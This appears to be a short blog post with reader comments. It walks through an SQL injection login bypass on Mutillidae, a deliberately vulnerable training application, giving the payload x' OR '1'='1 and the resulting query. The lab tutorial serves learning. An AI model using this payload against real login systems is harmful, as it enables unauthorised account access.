Posted by shinigami at 05:31
Read our previous post
In this post, I will write about SQL Injection bypass on Mutillidae.- Open http://localhost/mutillidae/?page=login.php
- Insert single quote in the form username and form password
You can see that some errors appears
From the error, we know that the query of SQL is :
SELECT * FROM accounts WHERE username=''' AND password='''
To begin the attackt, we need to modify this query. I will using this query for input username and password :
x' OR '1'='1
Now, enter the query above into username and password form.
- Wow, I'm loggin as admin
IN METASPLOITABLE... when i make de void field, or put a quote, i get the error that it is suposed to get, BUT i get another errors that are not documented for what i can see... can you help me? if you are still cheking the post... i se de table with the errors and below i see this (no screencap)
ReplyDeleteWARNING: Cannot modify header information - headers alreadysent by (output started at /var/www/mutullidae/index.php on line 148
the above repeats for lines 254 255 256...
i checked the lines, seems to be ok... let me know if u can help me please...
Make sure your installation is correctly.
ReplyDeleteI tried to download the latest mutillidae Version: 2.3.12 , configure the database and SQL Injection worked for me.
Hope this help.